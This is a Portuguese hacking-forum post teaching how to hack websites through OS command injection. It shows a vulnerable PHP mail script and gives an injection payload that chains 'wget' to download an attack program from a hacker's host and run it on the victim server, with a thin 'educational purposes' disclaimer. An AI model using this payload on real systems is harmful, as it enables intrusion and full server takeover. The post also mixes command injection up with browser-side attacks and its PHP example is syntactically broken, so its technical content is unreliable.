antiblock
Elveron
  • Chatbox

    You don't have permission to chat.
    Load More
Sign in to follow this  
V¡®u§

Hack websites utilizando injeção de comandos

1 post in this topic

Imagem colocada

To de volta http://cyber-gamers.org/public/style_emoticons/default/ph34r.png

Qual é a injeção de comandos?
Injeção de comandos é um método de ataque em que altera o conteúdo gerado dinamicamente em uma página da Web digitando comandos shell em um mecanismo de entrada, como um campo de formulário que não tem restrições de validação eficazes. Podemos explorar essa vulnerabilidade para obter acesso não autorizado a dados ou recursos de rede. Quando os usuários visitam uma página da Web afetada, seus navegadores interpretar o código, que pode causar comandos maliciosos sejam executados em computadores dos usuários e em suas redes. O objetivo do ataque de injeção de comando é para injetar e executar comandos especificados pelo atacante no site vulnerável. Em situação como esta, a aplicação, que executa os comandos do sistema não desejadas, é como uma concha pseudo sistema, e que o atacante pode usá-lo como qualquer usuário do sistema autorizado. No entanto, os comandos são executados com os mesmos privilégios e meio ambiente como o aplicativo tem. Ataques de injeção de comando é possível na maioria dos casos por falta de correta validação de dados de entrada, que pode ser manipulado pelo atacante (formulários, cookies, cabeçalhos HTTP, etc.)

Isso pode acontecer em qualquer linguagem de programação, mas é muito comum em PERL, PHP e CGI shell baseado. é menos comum em Java, Python e C + + .. http://cyber-gamers.org/public/style_emoticons/default/happy.png eu não tentei ainda lá, tentei uma vez ou duas vezes, mas não é capaz de fazê-lo, por isso incomum .. http://cyber-gamers.org/public/style_emoticons/default/rolleyes.gif

Vamos entender as coisas através de exemplos
Considere o código abaixo PHP:

<?PHP
$email_subject ="Bem-vindo à Cyber-Gamers";

if ( isset ($_GET {'email'} ) ) {
system( "mail " + $_GET {'email'}) + "-s ' " + $email_subject +
" ' < /tmp/email_body", $return_val);
}
?>



O código acima é um exemplo onde o usuário envia o seu endereço de e-mail no parâmetro e-mail, e que a entrada do usuário é colocado diretamente no comando do sistema.
Agora semelhante ao SQL injection ou injeção XPath, nosso objetivo é injetar o comando shell para o parâmetro-mail, mas tornar o código certo antes e depois do parâmetro e-mail permanecem sintaticamente corrigir caso contrário, a injecção não será executado.
Considere o sistema () chamada como jogo pequeno quebra-cabeça onde arranjar peça de quebra-cabeça diferente para fazer uma única imagem. Todas as peças, exceto uma parte estão no seu lugar, agora temos de encontrar a parte do meio para terminar o quebra-cabeça .. http://cyber-gamers.org/public/style_emoticons/default/laugh.png
tarefa simples no jogo, mas pouco complicado na injeção de comandos. Assim, nosso objetivo é algo mostrado abaixo:

mail [missing puzzle part] -s 'Bem-vindo à Cyber-Gamers' </tmp/email_body


Nota: Para a peça de quebra-cabeça faltando, precisamos garantir que o comando é executado corretamente e-mail e sai corretamente, basicamente, eu quero concentrar-se na sintaxe, deve ser sintaticamente correto.

Para o correio exemplo - corridas de ajuda vontade e saídas corretamente. Agora podemos acrescentar outros comandos shell adicionais, separando os comandos por um ponto e vírgula (;).
Nós também podemos comentar a parte de quebra-cabeça faltando usando o símbolo shell comentando (#) na frente. Assim, podemos manipular a peça de quebra-cabeça faltando conforme abaixo:

--help; wget http://somehackersit...attack_program; ./attack_program #


Agora, a adição de nossa parte de quebra-cabeça faltando para o nosso comando shell original existente, o comando abaixo shell é criado:

mail --help; wget http://somehackersit...attack_program; ./attack_program # s 'Bem-vindo à Cyber-Gamers' < /tmp/email_body


Este comando resultante é equivalente a abaixo de comando:

mail --help; wget http://somehackersit...attack_program; ./attack_program


O comando acima irá corre o e-mail - help e então faz o download do programa de ataque de somehackersite.com e executa-lo em vítima, permitindo que o hacker para executar os comandos arbitrários no site vulnerável. Na maioria dos casos, fornecer o acesso completo ao diretório raiz .. http://cyber-gamers.org/public/style_emoticons/default/sleep.png Agora fazer o que você quiser....

Nota: Esta é apenas para fins educacionais.Qualquer merda que você fizer to nen ai nen ti conheço http://cyber-gamers.org/public/style_emoticons/default/ph34r.png

Share this post


Link to post
Share on other sites
antiblock
Rodnia | Alpha & Omega

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now
Sign in to follow this